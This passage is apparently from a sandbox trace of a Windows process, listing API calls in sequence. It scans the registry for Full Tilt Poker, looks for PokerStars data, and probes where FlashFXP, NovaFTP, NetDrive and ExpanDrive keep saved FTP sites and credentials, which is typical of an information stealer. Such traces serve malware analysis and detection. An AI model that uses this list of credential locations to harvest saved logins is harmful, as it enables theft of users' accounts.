arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0245.626] GetProcessHeap () returned 0x740000 [0245.626] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7544f0 [0245.626] GetProcessHeap () returned 0x740000 [0245.627] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.628] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0245.628] GetProcessHeap () returned 0x740000 [0245.629] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7544f0 | out: hHeap=0x740000) returned 1 [0245.629] GetProcessHeap () returned 0x740000 [0245.629] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.696] GetProcessHeap () returned 0x740000 [0245.696] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4e0 [0245.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.697] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x75b4e0 | out: phkResult=0x75b4e0*=0x210) returned 0x0 [0245.698] GetProcessHeap () returned 0x740000 [0245.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0245.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.702] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x0, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="AppDataLow", pcchName=0x19fb90) returned 0x0 [0245.702] GetProcessHeap () returned 0x740000 [0245.702] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5d0 [0245.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.703] RegOpenKeyW (in: hKey=0x210, lpSubKey="AppDataLow", phkResult=0x75b5d0 | out: phkResult=0x75b5d0*=0x204) returned 0x0 [0245.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.704] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0245.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.706] RegCloseKey (hKey=0x204) returned 0x0 [0245.706] GetProcessHeap () returned 0x740000 [0245.706] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5d0 | out: hHeap=0x740000) returned 1 [0245.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.707] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x1, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="IM Providers", pcchName=0x19fb90) returned 0x0 [0245.707] GetProcessHeap () returned 0x740000 [0245.707] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b620 [0245.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.708] RegOpenKeyW (in: hKey=0x210, lpSubKey="IM Providers", phkResult=0x75b620 | out: phkResult=0x75b620*=0x204) returned 0x0 [0245.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.709] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0245.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.711] RegCloseKey (hKey=0x204) returned 0x0 [0245.711] GetProcessHeap () returned 0x740000 [0245.711] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b620 | out: hHeap=0x740000) returned 1 [0245.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.712] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x2, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="Microsoft", pcchName=0x19fb90) returned 0x0 [0245.712] GetProcessHeap () returned 0x740000 [0245.712] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b620 [0245.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.713] RegOpenKeyW (in: hKey=0x210, lpSubKey="Microsoft", phkResult=0x75b620 | out: phkResult=0x75b620*=0x204) returned 0x0 [0245.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.714] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0245.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.716] RegCloseKey (hKey=0x204) returned 0x0 [0245.716] GetProcessHeap () returned 0x740000 [0245.716] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b620 | out: hHeap=0x740000) returned 1 [0245.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.717] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x3, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="Netscape", pcchName=0x19fb90) returned 0x0 [0245.717] GetProcessHeap () returned 0x740000 [0245.717] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0245.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.719] RegOpenKeyW (in: hKey=0x210, lpSubKey="Netscape", phkResult=0x75b640 | out: phkResult=0x75b640*=0x204) returned 0x0 [0245.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.756] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0245.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.758] RegCloseKey (hKey=0x204) returned 0x0 [0245.758] GetProcessHeap () returned 0x740000 [0245.758] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0245.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.759] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x4, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="ODBC", pcchName=0x19fb90) returned 0x0 [0245.760] GetProcessHeap () returned 0x740000 [0245.760] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b550 [0245.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.761] RegOpenKeyW (in: hKey=0x210, lpSubKey="ODBC", phkResult=0x75b550 | out: phkResult=0x75b550*=0x204) returned 0x0 [0245.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.763] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0245.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.764] RegCloseKey (hKey=0x204) returned 0x0 [0245.764] GetProcessHeap () returned 0x740000 [0245.764] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b550 | out: hHeap=0x740000) returned 1 [0245.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.765] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x5, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="Policies", pcchName=0x19fb90) returned 0x0 [0245.765] GetProcessHeap () returned 0x740000 [0245.765] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b630 [0245.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.767] RegOpenKeyW (in: hKey=0x210, lpSubKey="Policies", phkResult=0x75b630 | out: phkResult=0x75b630*=0x204) returned 0x0 [0245.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.768] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0245.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.826] RegCloseKey (hKey=0x204) returned 0x0 [0245.826] GetProcessHeap () returned 0x740000 [0245.826] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b630 | out: hHeap=0x740000) returned 1 [0245.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.831] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x6, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="RegisteredApplications", pcchName=0x19fb90) returned 0x0 [0245.831] GetProcessHeap () returned 0x740000 [0245.831] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5d0 [0245.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.833] RegOpenKeyW (in: hKey=0x210, lpSubKey="RegisteredApplications", phkResult=0x75b5d0 | out: phkResult=0x75b5d0*=0x204) returned 0x0 [0245.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.835] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0245.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.836] RegCloseKey (hKey=0x204) returned 0x0 [0245.836] GetProcessHeap () returned 0x740000 [0245.836] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5d0 | out: hHeap=0x740000) returned 1 [0245.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.837] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x7, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="Wow6432Node", pcchName=0x19fb90) returned 0x0 [0245.837] GetProcessHeap () returned 0x740000 [0245.838] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0245.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.839] RegOpenKeyW (in: hKey=0x210, lpSubKey="Wow6432Node", phkResult=0x75b530 | out: phkResult=0x75b530*=0x204) returned 0x0 [0245.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.841] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0245.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.842] RegCloseKey (hKey=0x204) returned 0x0 [0245.842] GetProcessHeap () returned 0x740000 [0245.842] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0245.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.844] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x8, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="Classes", pcchName=0x19fb90) returned 0x0 [0245.844] GetProcessHeap () returned 0x740000 [0245.844] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6b0 [0245.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.845] RegOpenKeyW (in: hKey=0x210, lpSubKey="Classes", phkResult=0x75b6b0 | out: phkResult=0x75b6b0*=0x204) returned 0x0 [0245.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.847] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0245.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.848] RegCloseKey (hKey=0x204) returned 0x0 [0245.848] GetProcessHeap () returned 0x740000 [0245.848] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6b0 | out: hHeap=0x740000) returned 1 [0245.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.849] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x9, pszName=0x75b6c0, pcchName=0x19fb90 | out: pszName="", pcchName=0x19fb90) returned 0x103 [0245.850] GetProcessHeap () returned 0x740000 [0245.850] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0245.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.852] RegCloseKey (hKey=0x210) returned 0x0 [0245.852] GetProcessHeap () returned 0x740000 [0245.852] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4e0 | out: hHeap=0x740000) returned 1 [0245.852] GetProcessHeap () returned 0x740000 [0245.852] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.853] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.853] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0246.605] Sleep (dwMilliseconds=0xa) [0246.883] GetProcessHeap () returned 0x740000 [0246.883] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0246.884] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0246.885] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f920 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0246.885] GetProcessHeap () returned 0x740000 [0246.885] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x62) returned 0x75a6c0 [0246.885] GetProcessHeap () returned 0x740000 [0246.886] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0246.886] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*", lpFindFileData=0x19f934 | out: lpFindFileData=0x19f934*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x5f, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x75a6c0, ftLastWriteTime.dwLowDateTime=0x80, ftLastWriteTime.dwHighDateTime=0x758ad0, nFileSizeHigh=0x0, nFileSizeLow=0x6a, dwReserved0=0x1010000, dwReserved1=0x6a, cFileName="j", cAlternateFileName="ᕿ酰䑧鋫")) returned 0xffffffff [0246.887] GetProcessHeap () returned 0x740000 [0246.887] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0246.887] GetProcessHeap () returned 0x740000 [0246.888] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0246.888] GetProcessHeap () returned 0x740000 [0246.888] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0246.888] GetProcessHeap () returned 0x740000 [0246.888] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b908 [0246.888] GetProcessHeap () returned 0x740000 [0246.888] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0246.889] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0246.890] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0246.890] GetProcessHeap () returned 0x740000 [0246.890] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5a) returned 0x75bab0 [0246.891] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0246.892] wvsprintfW (in: param_1=0x75bab0, param_2="%s\\ExpanDrive", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0246.892] GetProcessHeap () returned 0x740000 [0246.892] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a6c0 [0246.892] GetProcessHeap () returned 0x740000 [0246.893] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bab0 | out: hHeap=0x740000) returned 1 [0246.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0246.894] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0246.894] GetProcessHeap () returned 0x740000 [0246.894] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0246.894] GetProcessHeap () returned 0x740000 [0246.895] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0246.895] GetProcessHeap () returned 0x740000 [0246.895] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0246.896] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.007] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0247.007] GetProcessHeap () returned 0x740000 [0247.007] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5a) returned 0x75bab0 [0247.008] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.009] wvsprintfW (in: param_1=0x75bab0, param_2="%s\\ExpanDrive", arglist=0x19fb6c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0247.009] GetProcessHeap () returned 0x740000 [0247.009] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a6c0 [0247.009] GetProcessHeap () returned 0x740000 [0247.010] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bab0 | out: hHeap=0x740000) returned 1 [0247.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.011] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0247.011] GetProcessHeap () returned 0x740000 [0247.011] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.011] GetProcessHeap () returned 0x740000 [0247.011] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0247.011] GetProcessHeap () returned 0x740000 [0247.012] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.012] GetProcessHeap () returned 0x740000 [0247.012] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b908 | out: hHeap=0x740000) returned 1 [0247.012] GetProcessHeap () returned 0x740000 [0247.012] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6c) returned 0x75b6c0 [0247.013] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.014] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Steed\\bookmarks.txt", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0247.014] GetProcessHeap () returned 0x740000 [0247.014] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x76) returned 0x756d18 [0247.014] GetProcessHeap () returned 0x740000 [0247.014] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.015] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0247.016] GetProcessHeap () returned 0x740000 [0247.016] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756d18 | out: hHeap=0x740000) returned 1 [0247.016] GetProcessHeap () returned 0x740000 [0247.016] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x400) returned 0x75b6c0 [0247.016] GetProcessHeap () returned 0x740000 [0247.016] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74ba10 [0247.016] GetProcessHeap () returned 0x740000 [0247.016] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.017] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.017] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0247.018] GetProcessHeap () returned 0x740000 [0247.018] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75bac8 [0247.019] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.019] wvsprintfW (in: param_1=0x75bac8, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0247.019] GetProcessHeap () returned 0x740000 [0247.019] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a6c0 [0247.019] GetProcessHeap () returned 0x740000 [0247.020] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bac8 | out: hHeap=0x740000) returned 1 [0247.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.021] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0247.021] GetProcessHeap () returned 0x740000 [0247.021] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.021] GetProcessHeap () returned 0x740000 [0247.021] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0247.022] GetProcessHeap () returned 0x740000 [0247.022] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.022] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.023] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0247.023] GetProcessHeap () returned 0x740000 [0247.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75bac8 [0247.023] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.024] wvsprintfW (in: param_1=0x75bac8, param_2="%s\\FlashFXP", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0247.024] GetProcessHeap () returned 0x740000 [0247.024] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a6c0 [0247.024] GetProcessHeap () returned 0x740000 [0247.025] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bac8 | out: hHeap=0x740000) returned 1 [0247.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.025] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0247.026] GetProcessHeap () returned 0x740000 [0247.026] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.495] GetProcessHeap () returned 0x740000 [0247.496] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0247.496] GetProcessHeap () returned 0x740000 [0247.496] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.497] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.497] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\ProgramData") returned 0x0 [0247.498] GetProcessHeap () returned 0x740000 [0247.498] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75bac8 [0247.499] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.501] wvsprintfW (in: param_1=0x75bac8, param_2="%s\\FlashFXP", arglist=0x19fb58 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0247.501] GetProcessHeap () returned 0x740000 [0247.501] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x32) returned 0x74d6e8 [0247.502] GetProcessHeap () returned 0x740000 [0247.502] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bac8 | out: hHeap=0x740000) returned 1 [0247.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.503] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0247.503] GetProcessHeap () returned 0x740000 [0247.504] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.504] GetProcessHeap () returned 0x740000 [0247.504] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74d6e8 | out: hHeap=0x740000) returned 1 [0247.504] GetProcessHeap () returned 0x740000 [0247.504] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.505] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.505] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\ProgramData") returned 0x0 [0247.505] GetProcessHeap () returned 0x740000 [0247.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75bac8 [0247.506] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.507] wvsprintfW (in: param_1=0x75bac8, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0247.507] GetProcessHeap () returned 0x740000 [0247.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x32) returned 0x74d6e8 [0247.507] GetProcessHeap () returned 0x740000 [0247.507] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bac8 | out: hHeap=0x740000) returned 1 [0247.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.509] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0247.509] GetProcessHeap () returned 0x740000 [0247.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.509] GetProcessHeap () returned 0x740000 [0247.510] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74d6e8 | out: hHeap=0x740000) returned 1 [0247.510] GetProcessHeap () returned 0x740000 [0247.510] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.510] GetProcessHeap () returned 0x740000 [0247.510] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ba10 | out: hHeap=0x740000) returned 1 [0247.510] GetProcessHeap () returned 0x740000 [0247.510] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.511] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.511] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0247.511] GetProcessHeap () returned 0x740000 [0247.511] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x75b6c0 [0247.512] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.513] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0247.513] GetProcessHeap () returned 0x740000 [0247.513] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a710 [0247.513] GetProcessHeap () returned 0x740000 [0247.514] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.515] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0247.515] GetProcessHeap () returned 0x740000 [0247.515] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a710 | out: hHeap=0x740000) returned 1 [0247.516] GetProcessHeap () returned 0x740000 [0247.516] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.516] GetProcessHeap () returned 0x740000 [0247.516] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x75b6c0 [0247.517] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.518] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\NetDrive\\NDSites.ini", arglist=0x19fb9c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0247.518] 